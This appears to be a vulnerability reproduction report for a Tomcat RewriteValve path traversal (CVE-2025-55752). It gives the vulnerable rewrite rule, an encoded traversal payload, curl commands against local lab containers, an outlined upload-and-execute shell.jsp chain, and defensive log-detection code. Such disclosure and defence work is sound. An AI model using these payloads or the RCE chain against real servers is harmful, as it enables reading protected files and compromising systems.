@namhikelo
Forked from N3mes1s/CVE-2025-55752.md
Created November 2, 2025 14:24

Apache Tomcat Rewrite Valve Relative Path Traversal (GHSA-wmwf-9ccg-fff5 / CVE-2025-55752)

Date: 2025-10-28

1. Executive Summary

We reproduced the relative path traversal vulnerability affecting Apache Tomcat versions 8.5.6–8.5.100, 9.0.0.M11–9.0.108, 10.1.0-M1–10.1.44, and 11.0.0-M1–11.0.10. The issue arises when RewriteValve rules incorporate user-controlled query parameters into rewritten URLs. Tomcat normalises the rewritten URI before decoding it, permitting encoded ../ sequences to slip past security constraints. During our assessment we:

  • Deployed a vulnerable Tomcat 9.0.108 instance with a rewrite rule representative of the affected applications.
  • Confirmed that an encoded traversal payload (path=%2FWEB-INF%2Fweb.xml) retrieves protected resources (HTTP 200) that should be inaccessible.
  • Verified that the same request against patched Tomcat 9.0.109 yields HTTP 404, demonstrating the effectiveness of the upstream fix.

Impact: Any protected resource reachable via the rewrite rule becomes accessible. If the application also allows authenticated uploads (e.g., WebDAV, file upload features), an attacker could plant a JSP and obtain remote code execution (RCE). Although RCE was not executed in this run, the scenario remains viable under the advisory’s conditions.

CWE Classification:

  • CWE-23: Relative Path Traversal
  • CWE-159: Failure to Handle Significant Value Encodings (relevant because the vulnerable code normalises the URL before decoding it)

2. Vulnerability Overview

2.1 Root Cause

The RewriteValve normalises rewritten URLs before decoding percent-encoded characters. When a rewrite rule copies a query parameter into the path, an attacker can supply encoded traversal sequences (e.g., %2e%2e/WEB-INF/web.xml). Normalisation removes literal ../ segments, but the encoded form survives it unchanged; the decode step that follows then restores the traversal, allowing access outside the intended directory.

Upstream correction (commit b5042622b8b78340ae65403c55dcb9c7416924df, released in Tomcat 11.0.11 / 10.1.45 / 9.0.109) reorders these operations: rewrite → decode → normalise.
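The ordering problem is easiest to see in a small model. The following is an added example, not Tomcat source and not part of the original report: normalize, is_protected and serve are this example's own names, and the protected-prefix check stands in for Tomcat's security constraint on /WEB-INF and /META-INF. Run it and the same rewritten URI is served under the vulnerable ordering (normalise, check, decode) and refused under the fixed ordering (decode, normalise, check).

```python
from urllib.parse import unquote

# Added illustration (not Tomcat code): a toy model of the two processing
# orders described in section 2.1. All names here are this example's own.

PROTECTED_PREFIXES = ("/WEB-INF", "/META-INF")


def normalize(path):
    """Resolve '.' and '..' segments and collapse repeated slashes.

    Returns None when a '..' would climb above the context root, which a
    real server treats as an invalid request.
    """
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not out:
                return None
            out.pop()
        else:
            out.append(seg)
    return "/" + "/".join(out)


def is_protected(path):
    """Security-constraint check applied to a (supposedly) normalised path."""
    upper = path.upper()
    return any(upper == p or upper.startswith(p + "/") for p in PROTECTED_PREFIXES)


def serve(rewritten_uri, decode_first):
    """Return (served, resource_path) for a rewritten URI under one ordering.

    decode_first=False models the vulnerable order: normalise, check, decode.
    decode_first=True models the fixed order: decode, normalise, check.
    """
    if decode_first:
        path = normalize(unquote(rewritten_uri))
        if path is None or is_protected(path):
            return False, path
        return True, path

    # Vulnerable order: the check sees the still-encoded path, so an encoded
    # slash or dot looks like an ordinary segment, not WEB-INF or '..'.
    checked = normalize(rewritten_uri)
    if checked is None or is_protected(checked):
        return False, checked
    # Decoding happens only after the check; the decoded path is what is served.
    return True, unquote(checked)


if __name__ == "__main__":
    for uri in ("/%2FWEB-INF%2Fweb.xml", "/%2e%2e/WEB-INF/web.xml", "/public/readme.txt"):
        print(uri, "vulnerable:", serve(uri, False), "fixed:", serve(uri, True))
```

Note that the fixed ordering does not need any extra blocklist: once decoding precedes normalisation, the encoded slash becomes a real path separator and the encoded dots become a real `..` segment before the constraint check runs, so the existing check catches them.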

2.2 Exploit Scenario

  1. Victim Tomcat app has a rewrite rule such as:
    RewriteCond %{QUERY_STRING} (^|&)path=([^&]+)
    RewriteRule ^/download$ /%2 [B,L]
  2. Attacker sends: GET /download?path=%2FWEB-INF%2Fweb.xml.
  3. Vulnerable Tomcat 9.0.108 responds with the contents of /WEB-INF/web.xml.
  4. Patched Tomcat 9.0.109 rejects the same request (HTTP 404).

If PUT/WebDAV or another upload mechanism exists, an attacker can:

  1. Upload shell.jsp into /webapps/<context>/uploads/.
  2. Request GET /download?path=%2Fuploads%2Fshell.jsp.
  3. Execute arbitrary code via the JSP.

3. Reproduction Environment

  • Base Image: tomcat:9.0.108-jdk17-temurin
  • Patched Control: tomcat:9.0.109-jdk17-temurin
  • Rewrite Rule: conf/Catalina/localhost/rewrite.config
  • Evidence Directory: evidence/latest/
  • Command Summary:
    nerdctl run --name tomcat-vuln -d -p 8080:8080 \
      -v "$PWD/conf":/usr/local/tomcat/conf \
      -v "$PWD/webapps":/usr/local/tomcat/webapps \
      tomcat:9.0.108-jdk17-temurin
    
    curl -i "http://localhost:8080/download?path=%2FWEB-INF%2Fweb.xml"
    
    nerdctl run --name tomcat-fixed -d -p 8081:8080 \
      -v "$PWD/conf":/usr/local/tomcat/conf \
      -v "$PWD/webapps":/usr/local/tomcat/webapps \
      tomcat:9.0.109-jdk17-temurin
    
    curl -i "http://localhost:8081/download?path=%2FWEB-INF%2Fweb.xml"

4. Evidence

4.1 Protected File Disclosure

  • vuln_body.xml (Tomcat 9.0.108) contains the full WEB-INF/web.xml:
    <?xml version="1.0" encoding="UTF-8"?>
    <web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" ...>
        <display-name>RewriteTraversalDemo</display-name>
        <description>Protected descriptor used to demonstrate CVE-2025-55752 traversal.</description>
    </web-app>
  • vuln_access.log: 200 response for /download?path=%2FWEB-INF%2Fweb.xml.
  • fixed_access.log: 404 response under Tomcat 9.0.109 for the same request.

4.2 Rewrite Configuration

conf/Catalina/localhost/rewrite.config:

RewriteCond %{QUERY_STRING} (^|&)path=([^&]+)
RewriteRule ^/download$ /%2 [B,L]

4.3 Server Configuration

conf/server.xml includes:

<Valve className="org.apache.catalina.valves.rewrite.RewriteValve" />

5. Impact Assessment

  • Information Disclosure: Any file under /WEB-INF or /META-INF can be read (credentials, configuration, proprietary code).
  • Potential RCE: If uploads (PUT/WebDAV, admin file manager, etc.) are enabled, attackers can plant JSP/EL payloads and execute OS commands.
  • Likelihood: Medium (depends on rewrite rule presence and upload capability).
  • Severity: High (system compromise possible).

6. Mitigation Recommendations

  1. Upgrade: Tomcat 11.0.11+, 10.1.45+, or 9.0.109+ (includes fix for CVE-2025-55752).
  2. Rewrite Rule Hygiene: Avoid copying raw query parameters into paths. Enforce a whitelist of permitted values, or reject encoded ../ sequences outright.
  3. Restrict PUT/WebDAV: Disable for untrusted users; lock down uploads to authenticated roles.
  4. Monitoring: Inspect access logs for %2FWEB-INF patterns; add WAF rules to block traversal sequences.
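Recommendation 4 can be turned into a concrete log check. The script below is an added example, not part of the original report or of Tomcat: it parses AccessLogValve lines in the common format, percent-decodes the request path and query a bounded number of times, and flags any line whose decoded form contains a .. segment or a WEB-INF/META-INF reference, or whose raw form carries an encoded slash, backslash or dot-dot. The sample log mixes the two excerpts from section 7 with constructed lines; CLF_RE, classify_target and scan_access_log are this example's own names.

```python
import re
from urllib.parse import unquote

# Added detection example (not from the original report). The log format is
# the Tomcat AccessLogValve "common" pattern; all helper names are this
# example's own.

CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+$'
)
DOT_DOT_RE = re.compile(r'(?:^|[^\w.])\.\.(?:[/\\]|$)')
PROTECTED_RE = re.compile(r'(?:^|/)(?:WEB-INF|META-INF)(?:/|$)', re.IGNORECASE)
ENCODED_RE = re.compile(r'%2[fF]|%5[cC]|(?:%2[eE]|\.)%2[eE]|%2[eE]\.')


def bounded_decode(s, rounds=3):
    """Percent-decode repeatedly, a bounded number of times, so nested
    encoding cannot hide a traversal from the checks below."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_target(target):
    """Return the reasons (possibly none) why a request target looks like an
    encoded traversal or a protected-directory access."""
    reasons = []
    path, _, query = target.partition("?")
    for label, part in (("path", path), ("query", query)):
        if not part:
            continue
        decoded = bounded_decode(part)
        if DOT_DOT_RE.search(decoded):
            reasons.append(f"{label}: '..' segment after decoding")
        if PROTECTED_RE.search(decoded):
            reasons.append(f"{label}: WEB-INF/META-INF reference after decoding")
        if ENCODED_RE.search(part):
            reasons.append(f"{label}: percent-encoded slash or dot in the raw request")
    return reasons


def scan_access_log(lines):
    """Return one finding per flagged log line. A 200 on a flagged request
    is the case that warrants immediate follow-up; a 404 still shows probing."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line.strip())
        if not m:
            continue  # not in the common format; a real deployment would log this
        reasons = classify_target(m["target"])
        if reasons:
            findings.append({
                "host": m["host"],
                "time": m["time"],
                "target": m["target"],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return findings


# Constructed sample: the excerpts from sections 7.3 and 7.4 plus two made-up lines
# (one encoded dot-dot probe, one benign download).
SAMPLE_LOG = """\
10.4.0.1 - - [28/Oct/2025:18:27:21 +0000] "GET / HTTP/1.1" 200 264
10.4.0.1 - - [28/Oct/2025:18:27:21 +0000] "GET /%2fWEB-INF%2fweb.xml?path=%2fWEB-INF%2fweb.xml HTTP/1.1" 200 460
10.4.0.1 - - [28/Oct/2025:18:27:32 +0000] "GET /%2fWEB-INF%2fweb.xml?path=%2fWEB-INF%2fweb.xml HTTP/1.1" 404 683
10.4.0.1 - - [28/Oct/2025:18:30:00 +0000] "GET /download?path=%2e%2e%2fWEB-INF%2fweb.xml HTTP/1.1" 200 460
10.4.0.1 - - [28/Oct/2025:18:31:00 +0000] "GET /download?path=report.pdf HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f["status"], f["target"], "; ".join(f["reasons"]))
```

Because the access log records the rewritten URI (compare the `GET /%2fWEB-INF%2fweb.xml?path=...` lines in section 7.3), both the path and the query are worth checking: the query shows the attacker-supplied value, and the path shows what the rewrite rule turned it into. Feed the same function the access log of a patched instance and the 404 lines remain useful as evidence of probing even though nothing was disclosed.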

7. Appendices

7.1 Full conf/Catalina/localhost/rewrite.config

RewriteCond %{QUERY_STRING} (^|&)path=([^&]+)
RewriteRule ^/download$ /%2 [B,L]

7.2 webapps/ROOT/WEB-INF/web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="https://jakarta.ee/xml/ns/jakartaee https://jakarta.ee/xml/ns/jakartaee/web-app_5_0.xsd"
         version="5.0">
    <display-name>RewriteTraversalDemo</display-name>
    <description>Protected descriptor used to demonstrate CVE-2025-55752 traversal.</description>
</web-app>

7.3 vuln_access.log (excerpt)

10.4.0.1 - - [28/Oct/2025:18:27:21 +0000] "GET / HTTP/1.1" 200 264
10.4.0.1 - - [28/Oct/2025:18:27:21 +0000] "GET /%2fWEB-INF%2fweb.xml?path=%2fWEB-INF%2fweb.xml HTTP/1.1" 200 460

7.4 fixed_access.log (excerpt)

10.4.0.1 - - [28/Oct/2025:18:27:32 +0000] "GET / HTTP/1.1" 200 264
10.4.0.1 - - [28/Oct/2025:18:27:32 +0000] "GET /%2fWEB-INF%2fweb.xml?path=%2fWEB-INF%2fweb.xml HTTP/1.1" 404 683

7.5 reproduction_steps.sh (selected commands)

nerdctl run --name tomcat-vuln -d -p 8080:8080 \
  -v "$PWD/conf":/usr/local/tomcat/conf \
  -v "$PWD/webapps":/usr/local/tomcat/webapps \
  tomcat:9.0.108-jdk17-temurin

curl -i "http://localhost:8080/download?path=%2FWEB-INF%2Fweb.xml"

nerdctl run --name tomcat-fixed -d -p 8081:8080 \
  -v "$PWD/conf":/usr/local/tomcat/conf \
  -v "$PWD/webapps":/usr/local/tomcat/webapps \
  tomcat:9.0.109-jdk17-temurin

curl -i "http://localhost:8081/download?path=%2FWEB-INF%2Fweb.xml"

8. Conclusion

The relative path traversal vulnerability (GHSA-wmwf-9ccg-fff5 / CVE-2025-55752) is reproducible on Tomcat versions up to 9.0.108. The fix in 9.0.109 blocks our exploit. Organizations should upgrade immediately and audit rewrite logic to prevent encoded traversal sequences. Where PUT/WebDAV is enabled, we strongly recommend additional hardening to avoid remote code execution.
